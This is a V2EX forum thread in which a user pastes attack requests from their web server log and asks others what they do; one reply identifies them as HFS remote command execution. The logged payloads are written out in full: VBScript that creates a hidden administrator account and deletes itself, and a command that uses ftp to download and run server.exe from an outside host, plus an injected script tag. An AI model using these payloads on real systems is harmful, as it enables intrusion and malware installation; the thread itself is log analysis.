套路云等了一个多月,终于来一个小学生,大佬看看代码什么意思

2017-11-23 15:17:55 +08:00
 feast

小学生还挺厉害的,成功注入 <script src="&lt;a href=" https:="" <a="" href="http://gist.github.com" rel="nofollow">gist.github.com="" anonymous="" 876061f144c87428a0552e8da23d36a4"="" rel="nofollow">https://gist.github.com/anonymous/876061f144c87428a0552e8da23d36a4"></script>

3900 次点击
所在节点    程序员
4 条回复
feast
2017-11-23 15:18:41 +08:00
shit,怎么不正常,干脆直接贴
10:21:58 222.186.57.27:1682 请求 GET /?search={.save|1.vbs|a=replace("Set*o=CreateObject(""Shell.Users""):Set*z=o.create(""IDC_witkey""):z.changePassword*""zxc123..."","""":z.setting(""AccountType"")=3","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.}
10:22:46 222.186.57.27:2013 请求 GET /?search={.save|cmd.vbs|a=replace("set*objShell=wscript.createObject(""wscript.shell""):objShell.Run(""cmd.exe*/c*echo*open*d.lengyue.win*>1.txt*&&*echo*123*>>1.txt*&&*echo*123*>>1.txt*&&*echo*get*server.exe*>>1.txt*&&*echo*bye*>>1.txt*&&*ftp*-s:1.txt*&&*server.exe""):wscript.quit","*",Chr(32)):Execute(a).
nyanyh
2017-11-23 16:01:26 +08:00
有这时间干点啥不好非要分析入侵日志
之前我在 vps 上跑了个 flask 接收我写的一个小程序上传的数据,有几个无聊 IP 不停地往那个端口发各种数据,刚开始还想分析分析到底发了什么,现在 log 都几百 M 了,一点看得兴趣都没有了……
sola97
2017-11-23 18:05:53 +08:00
不知道那个 server.exe 是干啥的
jimmy2010
2017-11-23 18:21:30 +08:00
hfs 远程命令命令执行

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/408898

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX